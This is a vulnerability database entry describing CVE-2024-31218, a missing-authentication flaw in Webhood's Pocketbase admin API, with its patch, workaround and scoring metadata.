CVE-2024-31218 in Webhoodinfo

Summary

by MITRE • 04/05/2024

Webhood is a self-hosted URL scanner used analyzing phishing and malicious sites. Webhood's backend container images in versions 0.9.0 and earlier are subject to Missing Authentication for Critical Function vulnerability. This vulnerability allows an unauthenticated attacker to send a HTTP request to the database (Pocketbase) admin API to create an admin account. The Pocketbase admin API does not check for authentication/authorization when creating an admin account when no admin accounts have been added. In its default deployment, Webhood does not create a database admin account. Therefore, unless users have manually created an admin account in the database, an admin account will not exist in the deployment and the deployment is vulnerable. Versions starting from 0.9.1 are patched. The patch creates a randomly generated admin account if admin accounts have not already been created i.e. the vulnerability is exploitable in the deployment. As a workaround, users can disable access to URL path starting with `/api/admins` entirely. With this workaround, the vulnerability is not exploitable via network.

If you want to get best quality of vulnerability data, you may have to visit VulDB.

Analysis

by VulDB Data Team • 04/05/2024

The vulnerability identified as CVE-2024-31218 affects Webhood, a self-hosted URL scanning tool designed for analyzing phishing and malicious websites. This tool utilizes Pocketbase as its backend database system, creating a critical security gap in versions 0.9.0 and earlier. The flaw represents a Missing Authentication for Critical Function vulnerability classified under CWE-306, where critical administrative functions lack proper authentication mechanisms. The vulnerability specifically targets the Pocketbase admin API endpoint that handles account creation, exploiting a fundamental design flaw in the default deployment configuration.

The technical implementation of this vulnerability stems from Pocketbase's default behavior when no administrative accounts exist within the database. When the Pocketbase admin API receives a request to create an admin account, it fails to verify authentication credentials if no existing admin accounts are present. This creates an exploitable condition where any unauthenticated attacker can send HTTP requests to the database's administrative API endpoints. The vulnerability is particularly dangerous because Webhood deployments typically do not create database admin accounts during default installation, leaving the system in a vulnerable state until manual intervention occurs. This authentication bypass allows attackers to gain administrative control over the database without requiring any prior credentials or authorization.

The operational impact of this vulnerability extends beyond simple unauthorized access, as it provides attackers with complete administrative control over the Webhood system's database. This includes the ability to modify scan results, manipulate threat intelligence data, and potentially access sensitive user information processed by the system. The vulnerability affects the confidentiality, integrity, and availability of the Webhood deployment, representing a significant risk for organizations relying on this tool for security operations. The attack surface is particularly concerning because it operates at the core database level, allowing adversaries to compromise the entire threat intelligence pipeline managed by Webhood.

The vulnerability is addressed in Webhood versions 0.9.1 and later through a patch that implements automatic generation of random admin accounts when no existing administrative accounts are detected. This mitigation approach follows security best practices by ensuring that authentication mechanisms are always present and functional, eliminating the window of opportunity for exploitation. Organizations can also implement a network-level workaround by disabling access to URL paths beginning with `/api/admins`, effectively preventing exploitation through the network interface. This defensive measure aligns with ATT&CK technique T1566.002 for phishing and T1078.004 for valid accounts, as it prevents unauthorized access to administrative functions. The patch demonstrates proper security engineering by implementing the principle of least privilege and ensuring that critical functions always require authentication regardless of the system's initial state, which aligns with security standards such as those outlined in NIST SP 800-53 and ISO 27001 controls.

Responsible

GitHub, Inc.

Reservation

03/29/2024

Disclosure

04/05/2024

Moderation

accepted

CPE

ready

EPSS

0.00715

KEV

no

Activities

very low

Sources

Do you know our Splunk app?

Download it now for free!